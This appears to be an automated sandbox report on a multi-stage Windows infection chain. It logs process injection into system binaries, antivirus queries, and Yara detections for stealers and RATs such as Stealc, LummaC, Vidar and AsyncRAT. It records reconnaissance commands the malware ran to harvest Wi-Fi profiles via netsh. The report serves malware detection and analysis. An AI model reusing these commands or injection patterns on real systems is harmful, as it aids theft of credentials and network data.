Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 636000
Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 637000
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 140000000
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 140001000
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 140008000
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 14000B000
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 14000D000
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: DD9587A010

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\FIJECAEHJJ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe "C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe "C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe "C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe "C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe "C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe "C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1023279001\a9afbb531e.exe "C:\Users\user\AppData\Local\Temp\1023279001\a9afbb531e.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe "C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\FIJECAEHJJ.exe "C:\Users\user\Documents\FIJECAEHJJ.exe"
Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Process created: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe "C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	Process created: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe "C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

Code function: 3_2_6C654760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

3_2_6C654760

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

Code function: 3_2_6C531C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

3_2_6C531C30

Source: 5fe60d6c80.exe, 00000015.00000002.3287999191.0000000001160000.00000040.00000001.01000000.00000011.sdmp, axplong.exe, 00000016.00000002.3321039831.0000000001020000.00000040.00000001.01000000.00000013.sdmp, axplong.exe, 00000017.00000002.3321504397.0000000001020000.00000040.00000001.01000000.00000013.sdmp	Binary or memory string: =Program Manager
Source: Y71AV1VIPLT8Y663WBDXSB.exe, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3145087715.000000000105A000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: nOProgram Manager
Source: 5fe60d6c80.exe, 00000015.00000002.3287999191.0000000001160000.00000040.00000001.01000000.00000011.sdmp, axplong.exe, 00000016.00000002.3321039831.0000000001020000.00000040.00000001.01000000.00000013.sdmp, axplong.exe, 00000017.00000002.3321504397.0000000001020000.00000040.00000001.01000000.00000013.sdmp	Binary or memory string: _=Program Manager
Source: k0ukcEH.exe, 0000001B.00000002.3536002772.0000000000BAB000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: MProgram Manager
Source: 4XVI62Q28CHMU2Y2V4F8.exe, 00000005.00000002.2591103348.0000000000BBB000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.2619360951.000000000107B000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000002.2634021132.000000000107B000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: FProgram Manager

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

Code function: 3_2_6C60AE71 cpuid

3_2_6C60AE71

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1022819001\hmUaBuJ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1022819001\hmUaBuJ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1023279001\a9afbb531e.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1023279001\a9afbb531e.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1023282001\7d66ff7c35.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1023282001\7d66ff7c35.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001527001\legs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001527001\legs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004899001\am209.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004899001\am209.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006343001\goldddd123.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006343001\goldddd123.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008664001\nnmp.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008664001\nnmp.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008788001\projectspecificpro.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008788001\projectspecificpro.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008943001\28c520debd.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008943001\28c520debd.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

Code function: 3_2_6C60A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_6C60A8DC

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

Code function: 3_2_6C558390 NSS_GetVersion,

3_2_6C558390

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 11.3.skotes.exe.9d0e9d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.skotes.exe.9d0e9d.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.3567702687.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.4044838292.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.3567876163.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.3761299972.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.3763224367.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.4048760844.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: skotes.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: t0IHakP.exe PID: 8100, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Source: i8Vwc7iOaG.exe, 00000000.00000003.2348956952.000000000129E000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2483147509.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2226901537.00000000012D2000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2226965505.0000000001258000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2227031189.0000000001242000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2349035521.0000000001242000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2226965505.000000000129E000.00000004.00000020.00020000.00000000.sdmp, t0IHakP.exe, 0000001D.00000002.5043378540.0000000005C6D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\am209[1].exe, type: DROPPED

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 23.2.axplong.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.5fe60d6c80.exe.f70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.skotes.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 53.2.axplong.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.axplong.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.skotes.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.FIJECAEHJJ.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.skotes.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.4XVI62Q28CHMU2Y2V4F8.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000003.3280907715.0000000005230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000003.3869120489.0000000005630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2590347965.0000000000981000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.3246634684.0000000004980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4738635134.0000000000E41000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2632687565.0000000000E41000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3165891597.00000000007B1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3287892835.0000000000F71000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.4622729473.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3279869843.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3321333193.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3320866189.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2617283452.0000000000E41000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: i8Vwc7iOaG.exe PID: 3640, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3141398938.0000000000C41000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3147595579.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Y71AV1VIPLT8Y663WBDXSB.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_valenciga[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe, type: DROPPED

Yara detected StormKitty Stealer

Source: Yara match	File source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: t0IHakP.exe PID: 8100, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: t0IHakP.exe PID: 8100, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match	File source: 20.2.52ba7a538c.exe.1e58000.2.raw.unpack, type: UNPACKEDPE
